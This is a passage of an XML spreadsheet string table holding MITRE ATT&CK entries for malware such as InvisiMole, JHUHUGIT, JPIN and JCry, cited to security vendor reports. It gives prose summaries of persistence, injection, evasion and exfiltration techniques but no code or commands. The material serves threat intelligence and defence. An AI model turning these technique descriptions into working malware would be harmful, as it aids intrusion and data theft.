    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can enumerate windows and child windows on a compromised host.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) uses a variation of the XOR cipher to encrypt files before exfiltration.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can use zlib to compress and decompress data.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) uses WinRAR to compress data that is intended to be exfiltrated.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can inject its code into a trusted process via the APC queue.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can record sound using input audio devices.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can sort and collect specific documents as well as generate a list of all files on a newly inserted drive and store them in an encrypted file.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can use fileless UAC bypass and create an elevated COM object to escalate privileges.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can use the &lt;code&gt;ITaskService&lt;/code&gt;, &lt;code&gt;ITaskDefinition&lt;/code&gt; and &lt;code&gt;ITaskSettings&lt;/code&gt; COM interfaces to schedule a task.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can register itself for execution and persistence via the Control Panel.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can be launched by using DLL search order hijacking in which the wrapper DLL is placed in the same folder as explorer.exe and loaded during startup into the Windows Explorer process instead of the legitimate library.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has used a custom implementation of DNS tunneling to embed C2 communications in DNS requests and replies.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can collect data from the system, and can monitor changes in specified directories.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can collect jpeg files from connected MTP devices.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can decrypt, unpack and load a DLL from its resources, or from blobs encrypted with Data Protection API, two-key triple DES, and variations of the XOR cipher.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has a command to disable routing and the Firewall on the victim’s machine.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can use Data Protection API to encrypt its components on the victim’s computer, to evade detection, and to make sure the payload can only be decrypted and loaded on one specific compromised computer.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has installed legitimate but vulnerable Total Video Player software and wdigest.dll library drivers on compromised hosts to exploit stack overflow and input validation vulnerabilities for code execution.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has exploited CVE-2007-5633 vulnerability in the speedfan.sys driver to obtain kernel mode privileges.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can spread within a network via the BlueKeep (CVE-2019-0708) and EternalBlue (CVE-2017-0144) vulnerabilities in RDP and SMB respectively.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) InvisiMole can identify proxy servers used by the victim and use them for C2 communication.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has been configured with several servers available for alternate C2 communications.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has deleted files and directories including XML and files successfully uploaded to C2 servers.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can list information about files in a directory and recently opened or used documents. [InvisiMole](https://attack.mitre.org/software/S0260) can also search for specific files by supplied file mask.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can create hidden system directories.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has executed legitimate tools in hidden windows.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has undergone regular technical improvements in an attempt to evade detection.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can upload files to the victim's machine for operations.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can can remove all system restore points.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can function as a proxy to create a server that relays communication between the client and C&amp;C server, or between two clients.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can use a JavaScript file as part of its execution chain.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can capture keystrokes on a compromised host.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has used ListPlanting to inject code into a trusted process.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has a command to list account information on the victim’s machine.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) determines a working directory where it stores all the gathered data about the compromised machine.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can deliver trojanized versions of software and documents, relying on user execution.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has attempted to disguise itself by registering under a seemingly legitimate service name.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has disguised its droppers as legitimate software or documents, matching their original names and locations, and saved its files as mpr.dll in the Windows folder.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has a command to create, set, copy, or delete a specified Registry key or value.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can use winapiexec tool for indirect execution of  &lt;code&gt;ShellExecuteW&lt;/code&gt; and &lt;code&gt;CreateProcessA&lt;/code&gt;.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can scan the network for open ports and vulnerable instances of RDP and SMB protocols.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">
[InvisiMole](https://attack.mitre.org/software/S0260) can disconnect previously connected remote drives.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can gather network share information.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has used TCP to download additional modules.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can use a modified base32 encoding to encode data within the subdomain of C2 requests.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) avoids analysis by encrypting all strings, internal files, configuration data and by using a custom executable format.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[InvisiMole](https://attack.mitre.org/software/S0260) can inject its backdoor as a portable executable into a target process.(Citation: ESET InvisiMole June 2020)	</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can obtain a list of running processes.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can inject itself into another process to avoid detection including use of a technique called ListPlanting that customizes the sorting algorithm in a ListView structure.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can mimic HTTP protocol with custom HTTP “verbs” HIDE, ZVVP, and NOP.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can enumerate Registry values, keys, and data.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can place a lnk file in the Startup Folder to achieve persistence.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has used rundll32.exe for execution.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has used scheduled tasks named &lt;code&gt;MSST&lt;/code&gt; and &lt;code&gt;\Microsoft\Windows\Autochk\Scheduled&lt;/code&gt; to establish persistence.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can capture screenshots of not only the entire screen, but of each separate window open, in case they are overlapping.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can check for the presence of network sniffers, AV, and BitDefender firewall.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) has used Windows services as a way to execute its malicious payload.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can use a .lnk shortcut for the Control Panel to establish persistence.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can collect information about installed software used by specific users, software executed on user login, and software executed by each system.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) uses variations of a simple XOR encryption routine for C&amp;C communications.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can check for artifacts of VirtualBox, Virtual PC and VMware environment, and terminate itself if they are detected.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can gather information on the mapped drives, OS version, computer name, DEP policy, memory size, and system volume serial number.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) gathers information on the IP forwarding table, MAC address, configured proxy, and network SSID.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) lists local users and session information.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can obtain running services on the victim.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) gathers the local system time from the victim’s machine.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can replace legitimate software or documents in the compromised network with their trojanized versions, in an attempt to propagate itself within the network.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) samples were timestomped by the authors by setting the PE timestamps to all zero values. [InvisiMole](https://attack.mitre.org/software/S0260) also has a built-in command to modify file times.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can remotely activate the victim’s webcam to capture content.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) uses HTTP for C2 communications.(Citation: ESET InvisiMole June 2018)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can launch a remote shell to execute commands.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[InvisiMole](https://attack.mitre.org/software/S0260) can register a Windows service named CsPower as part of its execution chain, and a Windows service named clr_optimization_v2.0.51527_X86 to achieve persistence.(Citation: ESET InvisiMole June 2020)</t>
  </si>
  <si>
    <t>[Invoke-PSImage](https://attack.mitre.org/software/S0231) can be used to embed payload data within a new image file.(Citation: GitHub PSImage)</t>
  </si>
  <si>
    <t>[Invoke-PSImage](https://attack.mitre.org/software/S0231) can be used to embed a PowerShell script within the pixels of a PNG file.(Citation: GitHub Invoke-PSImage)</t>
  </si>
  <si>
    <t>[IronNetInjector](https://attack.mitre.org/software/S0581) has the ability to decrypt embedded .NET and PE payloads.(Citation: Unit 42 IronNetInjector February 2021 )</t>
  </si>
  <si>
    <t>[IronNetInjector](https://attack.mitre.org/software/S0581) has the ability to inject a DLL into running processes, including the [IronNetInjector](https://attack.mitre.org/software/S0581) DLL into explorer.exe.(Citation: Unit 42 IronNetInjector February 2021 )</t>
  </si>
  <si>
    <t>[IronNetInjector](https://attack.mitre.org/software/S0581) has been disguised as a legitimate service using the name PythonUpdateSrvc.(Citation: Unit 42 IronNetInjector February 2021 )</t>
  </si>
  <si>
    <t>[IronNetInjector](https://attack.mitre.org/software/S0581) can obfuscate variable names, encrypt strings, as well as base64 encode and Rijndael encrypt payloads.(Citation: Unit 42 IronNetInjector February 2021 )</t>
  </si>
  <si>
    <t>[IronNetInjector](https://attack.mitre.org/software/S0581) can identify processes via C# methods such as &lt;code&gt;GetProcessesByName&lt;/code&gt; and running [Tasklist](https://attack.mitre.org/software/S0057) with the Python &lt;code&gt;os.popen&lt;/code&gt; function.(Citation: Unit 42 IronNetInjector February 2021 )</t>
  </si>
  <si>
    <t>[IronNetInjector](https://attack.mitre.org/software/S0581) can use an IronPython scripts to load a .NET injector to inject a payload into its own or a remote process.(Citation: Unit 42 IronNetInjector February 2021 )</t>
  </si>
  <si>
    <t>[IronNetInjector](https://attack.mitre.org/software/S0581) can use IronPython scripts to load payloads with the help of a .NET injector.(Citation: Unit 42 IronNetInjector February 2021 )</t>
  </si>
  <si>
    <t>[IronNetInjector](https://attack.mitre.org/software/S0581) has used a task XML file named &lt;code&gt;mssch.xml&lt;/code&gt; to run an IronPython script when a user logs in or when specific system events are created.(Citation: Unit 42 IronNetInjector February 2021 )</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) can collect data from a local system.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) has a command to delete a file from the machine.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) can list file and directory information.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) sets its own executable file's attributes to hidden.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) can download and execute additional files.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) has used registry values and file names associated with Adobe software, such as AcroRd32.exe.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) can list running processes.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) can achieve persistence by adding itself to the &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; Registry key.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) uses custom Base64 encoding schemes to obfuscate command and control traffic in the message body of HTTP requests.(Citation: Moran 2013)(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) collects the computer name of the victim's system during the initial infection.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) enumerates the IP address, network proxy settings, and domain name from a victim's system.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) collects the username from the victim’s machine.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) can list running services.(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) uses HTTP for command and control.(Citation: Moran 2013)(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) is capable of executing commands via [cmd](https://attack.mitre.org/software/S0106).(Citation: Trend Micro IXESHE 2012)</t>
  </si>
  <si>
    <t>[JCry](https://attack.mitre.org/software/S0389) has encrypted files and demanded Bitcoin to decrypt those files. (Citation: Carbon Black JCry May 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[JCry](https://attack.mitre.org/software/S0389) has been observed deleting shadow copies to ensure that data cannot be restored easily.(Citation: Carbon Black JCry May 2019)	</t>
  </si>
  <si>
    <t>[JCry](https://attack.mitre.org/software/S0389) has achieved execution by luring users to click on a file that appeared to be an Adobe Flash Player update installer. (Citation: Carbon Black JCry May 2019)</t>
  </si>
  <si>
    <t>[JCry](https://attack.mitre.org/software/S0389) has used PowerShell to execute payloads.(Citation: Carbon Black JCry May 2019)</t>
  </si>
  <si>
    <t>[JCry](https://attack.mitre.org/software/S0389) has created payloads in the Startup directory to maintain persistence. (Citation: Carbon Black JCry May 2019)</t>
  </si>
  <si>
    <t>[JCry](https://attack.mitre.org/software/S0389) has used VBS scripts. (Citation: Carbon Black JCry May 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[JCry](https://attack.mitre.org/software/S0389) has used &lt;code&gt;cmd.exe&lt;/code&gt; to launch PowerShell.(Citation: Carbon Black JCry May 2019)	</t>
  </si>
  <si>
    <t>A [JHUHUGIT](https://attack.mitre.org/software/S0044) variant accesses a screenshot saved in the clipboard and converts it to a JPG image.(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) has used COM hijacking to establish persistence by hijacking a class named MMDeviceEnumerator and also by registering the payload as a Shell Icon Overlay handler COM object ({3543619C-D563-43f7-95EA-4DA7E1CC396A}).(Citation: ESET Sednit Part 1)(Citation: Talos Seduploader Oct 2017)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) has exploited CVE-2015-1701 and CVE-2015-2387 to escalate privileges.(Citation: ESET Sednit Part 1)(Citation: ESET Sednit July 2015)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) tests if it can reach its C2 server by first attempting a direct connection, and if it fails, obtaining proxy settings and sending the connection through a proxy, and finally injecting code into a running browser if the proxy method fails.(Citation: ESET Sednit Part 1)</t>
  </si>
  <si>
    <t>The [JHUHUGIT](https://attack.mitre.org/software/S0044) dropper can delete itself from the victim. Another [JHUHUGIT](https://attack.mitre.org/software/S0044) variant has the capability to delete specified files.(Citation: ESET Sednit Part 1)(Citation: Unit 42 Sofacy Feb 2018)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) can retrieve an additional payload from its C2 server.(Citation: ESET Sednit Part 1)(Citation: Unit 42 Sofacy Feb 2018) [JHUHUGIT](https://attack.mitre.org/software/S0044) has a command to download files to the victim’s machine.(Citation: Talos Seduploader Oct 2017)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) has registered a Windows shell script under the Registry key &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt; to establish persistence.(Citation: ESET Sednit Part 1)(Citation: Talos Seduploader Oct 2017)</t>
  </si>
  <si>
    <t>Many strings in [JHUHUGIT](https://attack.mitre.org/software/S0044) are obfuscated with a XOR algorithm.(Citation: F-Secure Sofacy 2015)(Citation: ESET Sednit Part 1)(Citation: Talos Seduploader Oct 2017)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) obtains a list of running processes on the victim.(Citation: ESET Sednit Part 1)(Citation: Unit 42 Sofacy Feb 2018)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) performs code injection injecting its own functions to browser processes.(Citation: F-Secure Sofacy 2015)(Citation: Unit 42 Sofacy Feb 2018)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) has used a Registry Run key to establish persistence by executing JavaScript code within the rundll32.exe process.(Citation: ESET Sednit Part 1)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) is executed using rundll32.exe.(Citation: F-Secure Sofacy 2015)(Citation: Talos Seduploader Oct 2017)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) has registered itself as a scheduled task to run each time the current user logs in.(Citation: ESET Sednit Part 1)(Citation: ESET Sednit July 2015)</t>
  </si>
  <si>
    <t>A [JHUHUGIT](https://attack.mitre.org/software/S0044) variant takes screenshots by simulating the user pressing the "Take Screenshot" key (VK_SCREENSHOT), accessing the screenshot saved in the clipboard, and converting it to a JPG image.(Citation: Unit 42 Playbook Dec 2017)(Citation: Talos Seduploader Oct 2017)</t>
  </si>
  <si>
    <t>A [JHUHUGIT](https://attack.mitre.org/software/S0044) variant encodes C2 POST data base64.(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) obtains a build identifier as well as victim hard drive information from Windows registry key &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum&lt;/code&gt;. Another [JHUHUGIT](https://attack.mitre.org/software/S0044) variant gathers the victim storage volume serial number and the storage device name.(Citation: ESET Sednit Part 1)(Citation: Unit 42 Sofacy Feb 2018)</t>
  </si>
  <si>
    <t>A [JHUHUGIT](https://attack.mitre.org/software/S0044) variant gathers network interface card information.(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) variants have communicated with C2 servers over HTTP and HTTPS.(Citation: ESET Sednit Part 1)(Citation: Unit 42 Sofacy Feb 2018)(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) uses a .bat file to execute a .dll.(Citation: Talos Seduploader Oct 2017)</t>
  </si>
  <si>
    <t>[JHUHUGIT](https://attack.mitre.org/software/S0044) has registered itself as a service to establish persistence.(Citation: ESET Sednit Part 1)</t>
  </si>
  <si>
    <t>A [JPIN](https://attack.mitre.org/software/S0201) variant downloads the backdoor payload via the BITS service.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can lower security settings by changing Registry keys.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201)'s installer/uninstaller component deletes itself if it encounters a version of Windows earlier than Windows XP or identifies security-related processes running.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can communicate over FTP.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can enumerate drives and their types. It can also change file permissions using cacls.exe.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can download files and upgrade itself.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) contains a custom keylogger.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can obtain the permissions of the victim user.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can send email over SMTP.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>A [JPIN](https://attack.mitre.org/software/S0201) uses a encrypted and compressed payload that is disguised as a bitmap within the resource section of the installer.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can list running processes.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can inject content into lsass.exe to load a module.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can enumerate Registry keys.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) checks for the presence of certain security-related processes and deletes its installer/uninstaller component if it identifies any of them.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can obtain system information such as OS version and disk space.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can obtain network information, including DNS, IP, and proxies.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can obtain the victim user name.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can list running services.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) can use the command-line utility cacls.exe to change file permissions.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[JSS Loader](https://attack.mitre.org/software/S0648) has the ability to download malicious executables to a compromised host.(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>[JSS Loader](https://attack.mitre.org/software/S0648) can download and execute JavaScript files.(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>[JSS Loader](https://attack.mitre.org/software/S0648) has been executed through malicious attachments contained in spearphishing emails.(Citation: eSentire FIN7 July 2021)</t>
  </si>
  <si>
    <t>[JSS Loader](https://attack.mitre.org/software/S0648) has the ability to download and execute PowerShell scripts.(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>[JSS Loader](https://attack.mitre.org/software/S0648) has the ability to launch scheduled tasks to establish persistence.(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>[JSS Loader](https://attack.mitre.org/software/S0648) has been delivered by phishing emails containing malicious Microsoft Excel attachments.(Citation: eSentire FIN7 July 2021)</t>
  </si>
  <si>
    <t>[JSS Loader](https://attack.mitre.org/software/S0648) can download and execute VBScript files.(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>[Janicab](https://attack.mitre.org/software/S0163) captured audio and sent it out to a C2 server.(Citation: f-secure janicab)(Citation: Janicab)</t>
  </si>
  <si>
    <t>[Janicab](https://attack.mitre.org/software/S0163) used a valid AppleDeveloperID to sign the code to get past security restrictions.(Citation: Janicab)</t>
  </si>
  <si>
    <t>[Janicab](https://attack.mitre.org/software/S0163) used a cron job for persistence on Mac devices.(Citation: Janicab)</t>
  </si>
  <si>
    <t>[Janicab](https://attack.mitre.org/software/S0163) captured screenshots and sent them out to a C2 server.(Citation: f-secure janicab)(Citation: Janicab)</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) can use large obfuscated libraries to hinder detection and analysis.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Javali](https://attack.mitre.org/software/S0528) can capture login credentials from open browsers including Firefox, Chrome, Internet Explorer, and Edge.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
